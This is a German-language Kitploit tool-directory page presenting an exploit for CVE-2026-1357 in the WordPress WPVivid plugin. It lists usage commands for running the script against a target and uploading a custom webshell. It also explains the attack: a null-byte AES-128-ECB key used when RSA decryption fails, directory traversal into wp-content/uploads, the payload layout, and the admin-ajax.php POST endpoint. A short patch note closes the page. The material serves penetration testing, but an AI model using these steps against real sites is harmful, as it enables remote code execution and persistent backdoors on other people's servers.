Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Exploit-CVE-2026-1357 — Exploit für CVE-2026-1357 im WordPress-WPVivid-Plugin, der Remote-Codeausführung über manipulierte AES-verschlüsselte Payloads und Directory Traversal zum Hochladen einer Webshell ermöglicht. | Kitploit
Tools/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

Exploit für CVE-2026-1357 im WordPress-WPVivid-Plugin, der Remote-Codeausführung über manipulierte AES-verschlüsselte Payloads und Directory Traversal zum Hochladen einer Webshell ermöglicht.

Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Abhängigkeiten installieren

pip3 install pycryptodome requests

Basis-Exploit

python3 wpvivi.py http://target.com

Benutzerdefinierte Webshell

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" Technische Erklärung: Null Byte Key: Wenn RSA-Entschlüsselung fehlschlägt, gibt sie false zurück, was phpseclib als "\x00\x00\x00" behandelt. Wir verwenden 16 Null-Bytes als AES-128-ECB-Schlüssel. Directory Traversal: Der Dateiname wird nicht bereinigt, was ../../../../wp-content/uploads/shell.php ermöglicht. Payload-Format:

[len_key_hex(2 Bytes)] + [key_hex] + [len_data_hex(16 Bytes)] + [encrypted_data] Ausführung: POST an /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(verschlüsselte Payload) Erkennung und Mitigation:

Gepatched in 0.9.124:

  • Prüfung if ($key === false || empty($key)) return false;
  • Erweiterungs-Whitelist: zip,gz,tar,sql
Tool herunterladen